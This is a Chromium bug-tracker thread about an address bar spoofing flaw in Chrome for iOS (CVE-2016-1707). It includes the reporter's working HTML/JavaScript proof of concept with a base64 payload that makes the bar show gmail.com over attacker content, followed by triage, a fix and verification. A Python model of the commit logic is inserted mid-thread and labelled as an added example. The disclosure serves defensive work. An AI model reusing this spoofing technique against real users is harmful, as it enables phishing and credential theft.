
Issue 622183 link

Starred by 1 user

Issue metadata

Status: Verified
Owner:
Closed: Jun 2016
Cc:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 1
Type: Bug-Security




Security: Chrome Address Bar URL spoofing on IOS

Reported by xis...@gmail.com, Jun 22 2016

Issue description

Agent:
Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/51.0.2704.64 Mobile/13G21 Safari/601.1.4


DESCRIPTION:

Chrome Address Bar URL spoofing on IOS

POC:

http://xisigr.com/test/spoof/chrome/1.html
http://xisigr.com/test/spoof/chrome/2.html


Attachments: spoof-1.jpg (96.3 KB), spoof-2.jpg (46.6 KB)

Comment 1 by xis...@gmail.com, Jun 22 2016

POC:
```html
<script>
// base64 of the small page shown below (an anchor whose href is the malformed
// 'https://gmail.com::', appended to the body and clicked)
payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

function pwned() {
    // 'aaaa' is the window opened by the anchor below; it is left at about:blank
    // because its href is invalid, so this page may still write into it
    var t = window.open('https://www.gmail.com', 'aaaa');
    t.document.write(atob(payload));
    t.document.write("<h1>Address bar says https://www.gmail.com - this is NOT https://www.gmail.com</h1>");
}
</script>
<a href="https://hack.com::/" target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>
```

base64 payload code:
```html
<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>
```
Components: Security>UX
Labels: OS-iOS
Owner: palmer@chromium.org
This appears to be the same idea as issue 599956. Since the page is actually loaded at about:blank, trying to grab cookies or the like won't work. +palmer to confirm

Comment 3 by palmer@chromium.org, Jun 22 2016

Cc: pinkerton@chromium.org pkl@chromium.org
Labels: Security_Severity-High Security_Impact-Stable M-53
Owner: eugene...@chromium.org
Status: Assigned (was: Unconfirmed)
The attack payload is:

```html
<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>
```

According to the severity guidelines (https://www.chromium.org/developers/severity-guidelines): "An address bar spoof where only certain URLs can be displayed, or with other mitigating factors (265221)." would be Medium. But this PoC is not subject to any such mitigations, so it's a very nice phishing attack.

eugenebut, pkl, pinkerton: Could one of you please identify an appropriate owner for this bug? Thanks!
I am a good owner for this bug.
Status: Started (was: Assigned)

Comment 6 Deleted

Labels: ReleaseBlock-Stable M-52
Cc: kkhorimoto@chromium.org
Here is what's actually happening:
1.) decidePolicyForNavigationAction: called with 'https://gmail.com::' and chrome allows the load
2.) didStartProvisionalNavigation: called with 'https://gmail.com::' which chrome adds as a pending entry.
3.) didCommitNavigation: called with 'about:blank' but chrome commits pending entry ('https://gmail.com::') and promotes it as a last committed URL
4.) didFinishNavigation: called
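The four-step sequence above, modelled in Python as an added example that is not Chromium's code: the pending entry recorded at provisional start is promoted at commit time regardless of what was really committed, and the `validate_on_commit` path mirrors the later fix "Do not commit invalid URLs during web load". `is_valid_url`, `NavigationModel` and `run_load` are constructed names, and Python's `urlsplit` port check stands in for Chromium's URL parser.

```python
from urllib.parse import urlsplit


def is_valid_url(url):
    """Return False for URLs a strict parser refuses.  'https://gmail.com::'
    fails because its port component is ':' rather than digits; Python's
    urlsplit port check stands in for Chromium's URL parser here."""
    try:
        parts = urlsplit(url)
        if parts.scheme in ("http", "https"):
            if not parts.hostname:
                return False
            _ = parts.port  # raises ValueError on a malformed port
            return True
        return parts.scheme == "about"
    except ValueError:
        return False


class NavigationModel:
    """Constructed model of the bookkeeping in the step list above: a
    pending entry is recorded at provisional start and promoted to the
    last-committed (address-bar) URL at commit time."""

    def __init__(self, validate_on_commit):
        self.validate_on_commit = validate_on_commit  # False = pre-fix
        self.pending = None
        self.last_committed = "about:blank"

    def did_start_provisional_navigation(self, url):
        self.pending = url  # step 2: URL becomes the pending entry

    def did_commit_navigation(self, actual_url):
        # step 3: pre-fix code promotes the pending entry no matter what
        # was really committed; the fixed path refuses to commit a pending
        # URL that fails validation and keeps the real URL instead.
        pending_ok = self.pending is not None and (
            not self.validate_on_commit or is_valid_url(self.pending))
        self.last_committed = self.pending if pending_ok else actual_url
        self.pending = None
        return self.last_committed


def run_load(requested_url, validate_on_commit):
    """Drive one navigation where WebKit really commits about:blank (what
    the malformed href produces) and return the address-bar URL."""
    nav = NavigationModel(validate_on_commit)
    nav.did_start_provisional_navigation(requested_url)  # steps 1-2: allowed
    return nav.did_commit_navigation("about:blank")      # step 3
```

With validation off the model shows the spoofed 'https://gmail.com::'; with it on, the address bar falls back to about:blank, matching what the verifier saw on the fixed builds.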

Comment 10 by sheriffbot@chromium.org, Jun 23 2016

Labels: Pri-1
Labels: Merge-Request-52 Merge-Request-53
Status: Fixed (was: Started)

Comment 12 by sheriffbot@chromium.org, Jun 24 2016

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -Merge-Request-53 Merge-Request-51
Labels: -Merge-Request-51 -Merge-Request-52 Merge-Approved-52 Merge-Approved-51

Comment 16 by bugdroid1@chromium.org, Jun 24 2016

Labels: -merge-approved-52 merge-merged-2743
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

commit 5967e8c0fe0b1e11cc09d6c88304ec504e909fd5
Author: Eugene But <eugenebut@google.com>
Date: Fri Jun 24 17:52:58 2016

[ios] Do not commit invalid URLs during web load.

BUG=622183

Review-Url: https://codereview.chromium.org/2086333003
Cr-Commit-Position: refs/heads/master@{#401761}
(cherry picked from commit c2d2b0f2f74dad0bdef196cf1657f0d584cbe3a7)

Review URL: https://codereview.chromium.org/2096023002 .

Cr-Commit-Position: refs/branch-heads/2743@{#467}
Cr-Branched-From: 2b3ae3b8090361f8af5a611712fc1a5ab2de53cb-refs/heads/master@{#394939}

[modify] https://crrev.com/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5/ios/web/web_state/ui/crw_web_controller.mm

Cc: cma...@chromium.org
Labels: -Merge-Approved-51
This does not need to be merged to M51
Labels: reward-topanel Release-0-M52
Thanks for your report. We'll consider your report under the Chrome Reward Program for a security cash reward - full details here: https://www.google.com/about/appsecurity/chrome-rewards/

We'll update you once we have a decision. Feel free to check in with me in a few weeks if you haven't heard back, either by updating this bug or reaching out to me at awhalley@
Cc: srikanthg@chromium.org
Labels: -reward-topanel reward-3000
Congratulations, the panel decided to award $3,000 for this bug!  Our finance team will be in touch within a few weeks to arrange the details.

<boilerplate>
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.</boilerplate>

Labels: reward-unpaid

Comment 23 by xis...@gmail.com, Jul 14 2016

Thanks! Credit as "xisigr of Tencent's Xuanwu Lab" would be good.
Labels: -reward-unpaid reward-inprocess
Status: Verified (was: Fixed)
I ran both POCs reported in comment#0 and the issue is now fixed.
about:blank is displayed in both the cases.
Verified on M52.0.2743.82 beta, M53.0.2785.22 beta versions.
Devices: iPad Air2, iPad mini, iPhone6 plus, iPhone6s.
iOS: 9.3.2, 10.0

One observation here is: Both of these tests are not reproducible on the current stable version of Chrome (M51) on iOS10 (i.e. even without fix).
Labels: CVE-2016-1707
Labels: -ReleaseBlock-Stable

Comment 28 by sheriffbot@chromium.org, Sep 30 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 29 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 30 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label
Labels: CVE_description-submitted
